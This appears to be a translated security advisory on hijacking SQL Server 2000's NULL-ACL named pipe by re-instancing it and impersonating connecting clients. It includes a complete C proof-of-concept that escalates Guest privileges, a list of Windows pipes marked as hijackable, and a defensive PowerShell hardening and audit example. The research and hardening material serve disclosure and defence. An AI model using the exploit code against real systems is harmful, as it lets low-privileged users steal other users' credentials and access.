SQL Server 2000 communication pipe hijacking by later reuse

Author: Flashsky
SITE:WWW.XFOCUS.NET
Mail: flashsky@xfocus.org

SQL Server 2000 accepts client connections over a named pipe with a well-known name:
Default instance: \\.\pipe\sql\query
Named instance: \\.\pipe\mssql$instancename\sql\query
The pipe name can also be discovered by querying UDP port 1434.

However, because SQL Server 2000 creates this pipe with a NULL ACL, a user at any privilege level can hijack it. The previously known hijacking technique was to stop the service, create a pipe of the same name, and then start the service so that it used the pipe that had already been created under that name. In fact SQL Server 2000 checks whether a pipe of the same name already exists and, if so, picks a different name; and a low-privileged user cannot start and stop the service anyway (unless some other vulnerability is exploited). Actual testing of the pipe, however, shows that when the ACL is NULL, a pipe created later under the same name can also hijack the connection: simply reuse the pipe (create another instance of the same name), then open a few connections to it yourself and do not release them. How many are needed depends on the number of instances the real pipe has created; in my tests \\.\pipe\sql\query needed only 1 before it could be hijacked, while \\.\pipe\lsass needed 4 or 5. The ACL on \\.\pipe\lsass, however, only lets administrators hijack it.
Once the attacker has reused the pipe name and holds several unreleased connections (consuming the instances of the normal pipe), the next client connection to the pipe is delivered to the instance the attacker is listening on, and the rest is the old trick of calling the impersonation function to obtain the connecting client's privileges:
The following is a simple example of hijacking SQL Server 2000 pipe traffic.
Environment: SQL Server 2000 + SP2
Windows 2000 Server (Chinese edition) + SP3
Test procedure:
1. Configure SQL Server to allow named pipe connections and Windows integrated authentication, add a highly privileged local Windows account that is allowed to log in to SQL Server, and start the SQL Server service.
2. Create a file TEST.TXT on drive C with an ACL that denies Guest all access and allows everyone else.
3. On another machine, B, log on with the Windows account that was granted SQL Server login, and set the client network library to named pipes only (if more than one library is enabled, the connection may be made over one picked at random, not necessarily the pipe).
4. Use SQL Server Enterprise Manager on B to establish a connection to SQL Server with Windows integrated authentication.
5. On the SQL Server machine (A), run the C program below as the Guest account. It first reports that TEST.TXT cannot be opened, then hijacks the pipe and waits for a client pipe connection.
6. Connect to SQL Server from machine B again; the program on host A intercepts the pipe connection as the highly privileged login user and then opens the file it had no permission to open before.

Of course, the practical significance of this particular attack is probably limited: relatively few SQL Server deployments are now estimated to use named pipes for communication, and in most cases TCP is actively chosen for connections. But it does show that a pipe without good ACL protection can be hijacked even after it has been created, which removes the need to stop the service or predict the name beforehand, and that care is needed when writing server-side pipe applications.
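A hardened counterpart to the server-side carelessness described above, added here as an example (not code from the article or from SQL Server): it creates a pipe with an explicit DACL that withholds the create-instance right from clients, reads the live ACL back to flag any ACE that would still permit re-instancing, and connects with an identification-level token so that a rogue instance could not reuse the caller's privileges. It assumes Windows PowerShell 5.1 (.NET Framework pipe classes) and uses a placeholder pipe name.

```powershell
# Added example (not from the article). Assumes Windows PowerShell 5.1 on
# Windows (.NET Framework pipe classes); "harden-demo" is a placeholder name.
$pipeName = 'harden-demo'
$me = [System.Security.Principal.WindowsIdentity]::GetCurrent().User

# Explicit DACL instead of the NULL DACL SQL Server 2000 used. The owning
# account keeps FullControl (it needs CreateNewInstance for its own pool).
$sec = New-Object System.IO.Pipes.PipeSecurity
$sec.AddAccessRule((New-Object System.IO.Pipes.PipeAccessRule(
    $me, [System.IO.Pipes.PipeAccessRights]::FullControl,
    [System.Security.AccessControl.AccessControlType]::Allow)))
# Clients get exactly ReadData|WriteData|Synchronize: not Write/ReadWrite and
# above all not CreateNewInstance (0x4), the right that lets another user add
# an instance of the name and wait for victims. Raw Win32 code has the same
# trap in GENERIC_WRITE: FILE_GENERIC_WRITE contains FILE_APPEND_DATA, whose
# bit 0x4 is FILE_CREATE_PIPE_INSTANCE on a pipe object.
$clientRights = ([System.IO.Pipes.PipeAccessRights]::ReadData -bor
                 [System.IO.Pipes.PipeAccessRights]::WriteData -bor
                 [System.IO.Pipes.PipeAccessRights]::Synchronize)
$sec.AddAccessRule((New-Object System.IO.Pipes.PipeAccessRule(
    'NT AUTHORITY\Authenticated Users', $clientRights,
    [System.Security.AccessControl.AccessControlType]::Allow)))
$server = New-Object System.IO.Pipes.NamedPipeServerStream(
    $pipeName, [System.IO.Pipes.PipeDirection]::InOut, 1,
    [System.IO.Pipes.PipeTransmissionMode]::Message,
    [System.IO.Pipes.PipeOptions]::Asynchronous, 4096, 4096, $sec)

# Audit: read the live DACL back and flag any ACE that grants
# CreateNewInstance to a principal other than the owner.
$acl = $server.GetAccessControl()
Write-Host ('SDDL: ' + $acl.GetSecurityDescriptorSddlForm('Access'))
foreach ($ace in $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
    $create = [int]($ace.PipeAccessRights -band [System.IO.Pipes.PipeAccessRights]::CreateNewInstance)
    if ($create -ne 0 -and $ace.IdentityReference.Value -ne $me.Value) {
        Write-Warning "$($ace.IdentityReference) can add instances of \\.\pipe\$pipeName"
    }
}
# Client side: Identification level is SECURITY_SQOS_PRESENT|SECURITY_IDENTIFICATION
# in CreateFile, so a rogue instance that calls ImpersonateNamedPipeClient gets
# a token it cannot use to open files as the caller.
$client = New-Object System.IO.Pipes.NamedPipeClientStream(
    '.', $pipeName, [System.IO.Pipes.PipeDirection]::InOut,
    [System.IO.Pipes.PipeOptions]::None,
    [System.Security.Principal.TokenImpersonationLevel]::Identification)
$wait = $server.BeginWaitForConnection($null, $null)
$client.Connect(2000)
$server.EndWaitForConnection($wait)
Write-Host ('Server sees client as: ' + $server.GetImpersonationUserName())
$client.Dispose(); $server.Dispose()
```

On a Win32 server, additionally passing FILE_FLAG_FIRST_PIPE_INSTANCE to CreateNamedPipe makes the call fail if another process already owns the name, which catches the older create-before-the-service variant as well.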

SQL SERVER 2000 Hijacking code

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    HANDLE pipea;          /* our own instance of the SQL Server pipe */
    HANDLE pipeb[100];     /* client handles used to consume the real instances */
    FILE *fp;
    DWORD ret;
    DWORD num;
    DWORD dwsize;
    DWORD dwnumber = 0;
    char szuser[256];
    int i;

    /* First test: under Guest permissions the file cannot be opened */
    fp = fopen("C:\\Test.txt", "w");
    if (fp == NULL)
        printf("Now you don't open file\n");
    else
        fclose(fp);

    /* Create a pipe with the same name, reusing SQL Server's existing pipe.
       The nMaxInstances argument was missing from the original listing;
       PIPE_UNLIMITED_INSTANCES is assumed, matching the existing pipe. */
    pipea = CreateNamedPipe("\\\\.\\pipe\\sql\\query", PIPE_ACCESS_DUPLEX,
                            PIPE_TYPE_MESSAGE | PIPE_WAIT, PIPE_UNLIMITED_INSTANCES,
                            2048, 2048, NMPWAIT_USE_DEFAULT_WAIT, NULL);
    if (pipea == INVALID_HANDLE_VALUE) {
        ret = GetLastError();
        printf("Error in CreateNamedPipe! code=%lu\n", ret);
        return 1;
    }

    /* Consume the other, normal instances */
    if (WaitNamedPipe("\\\\.\\pipe\\sql\\query", NMPWAIT_WAIT_FOREVER) == 0) {
        printf("No this pipe\n");
        return 1;
    }
    /* The count can be adjusted; for SQL Server one is enough */
    for (i = 0; i < 1; i++) {
        Sleep(20);
        pipeb[i] = CreateFile("\\\\.\\pipe\\sql\\query", GENERIC_WRITE | GENERIC_READ,
                              0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
        if (pipeb[i] == INVALID_HANDLE_VALUE) {
            printf("Open pipe failed\n");
            return 1;
        }
        /* WriteFile(pipeb[i], "test1", 5, &num, NULL); */
        WriteFile(pipeb[i], "test2", 5, &num, NULL);
    }

    /* Then wait for a client connection */
    ConnectNamedPipe(pipea, NULL);
    ReadFile(pipea, (void *)&dwnumber, 4, &dwsize, NULL);
    /* Impersonate the connecting user */
    ImpersonateNamedPipeClient(pipea);
    dwsize = 256;
    /* Obtain the user information */
    GetUserName(szuser, &dwsize);
    printf("Impersonating: %s\n", szuser);
    /* Test again whether the file can be opened, proving that privileges were elevated */
    fp = fopen("C:\\Test.txt", "w");
    if (fp != NULL) {
        printf("Now can open file\n");
        fclose(fp);
    }

    DisconnectNamedPipe(pipea);
    CloseHandle(pipea);
    for (i = 0; i < 1; i++)
        CloseHandle(pipeb[i]);
    return 0;
}

Addendum:
All named pipes are subject to this problem; it comes down to whether the ACL allows you to reuse (re-instance) the name. As long as the name can be reused, the pipe can be hijacked.
I was able to hijack \\.\pipe\lsass as well, but its ACL only lets administrators do so.
The default pipes tested so far have basically reasonable ACLs that do not allow low-privileged users to create new instances, but the SQL Server pipe's ACL is clearly very poor.
There may be more services, or third-party services, whose pipes lack good ACL protection, which means reuse-based hijacking can succeed against them too.

Here are the results of testing the system pipes with all the default Windows services started (Terminal Services was not running, since it is not installed on my machine; where it is installed, its pipes could be tested too). This cannot be called meaningless either: I have seen an article that specifically recommends using integrated authentication with named pipe communication to get a "more secure" SQL Server, hey?
Pipe name (current instances, maximum instances)

Initshutdown (2,-1) <---------------can be hijacked under admin
Net\ntcontrolpipe5 (1, 1)
LLSRPC (2,-1) <---------------can be hijacked under admin
000001e8.000 (2,-1) <-----------can be hijacked under admin
Net\ntcontrolpipe8 (1, 1)
Net\ntcontrolpipe9 (1, 1)
PROFMAPAPI (2,-1) <--------------can be hijacked under admin
Epmapper (2,-1) <----------------can be hijacked under admin
wmiep_454 (2,-1) <---------------can be hijacked under admin <------Guest users can hijack
wmiep_444 (2,-1) <---------------can be hijacked under admin <------Guest users can hijack
NET\NTCONTROLPIPE11 (1, 1)
WMIEP_3C8 (2,-1) <---------------can be hijacked under admin
Net\ntcontrolpipe12 (1, 1)
Net\ntcontrolpipe13 (1, 1)
NDDEAPI (2,-1) <-----------------can be hijacked under admin <------Guest users can hijack
NetDDE (1, 1) returns a busy error message for all pipe instances and does not know whether ACL settings permit reuse
NET\NTCONTROLPIPE14 (1, 1)
winsock2\catalogchangelistener-e8-0 (1, 1) <-----------------can be hijacked under admin
NET\NTCONTROLPIPE15 (1, 1)
winsock2\catalogchangelistener-574-0 (1, 1) <-----------------can be hijacked under admin
wmiep_640 (2,-1) <-----------------can be hijacked under admin
winsock2\catalogchangelistener-640-0 (1, 1) <-----------------can be hijacked under admin
Net\ntcontrolpipe25 (1, 1)
WMIEP_6F0 (2,-1) <-----------------can be hijacked under admin
Sql\console (1,-1) <---------------can be hijacked under admin <------Guest users can hijack
Sql\query (1,-1) <-----------------can be hijacked under admin <------Guest users can hijack
Net\ntcontrolpipe26 (1, 1)
Tsx_listener (1, 1) returns a busy error message for all pipe instances and does not know whether ACL settings permit reuse
WinReg (2,-1) <-----------------can be hijacked under admin
winsock2\catalogchangelistener-6f0-0 (1, 1) <-----------------can be hijacked under admin

Pipes that can be hijacked under Guest permissions:
wmiep_454 (2,-1) <---------------can be hijacked under admin <------Guest users can hijack
wmiep_444 (2,-1) <---------------can be hijacked under admin <------Guest users can hijack
Nddeapi (2,-1) <-----------------can be hijacked under admin <------Guest users can hijack
Sql\console (1,-1) <---------------can be hijacked under admin <------Guest users can hijack
Sql\query (1,-1) <-----------------can be hijacked under admin <------Guest users can hijack
SQL Server goes without saying, but it is not clear what the sql\console pipe is used for; if something uses it by default, it is probably another attack point.
NDDEAPI basically only matters where an NDDEAPI application is present.
WMI is harder: it appears that a new pipe is built up for each connection, so reuse after the fact achieves little, and only the method of predicting the name in advance would work. Strangely, the permissions differ: some WMI pipes cannot be reused by Guest and some can. When I have time I will specifically test the pipe traffic generated between the WMI client and server; perhaps it also takes a default pipe name that could be attacked :)
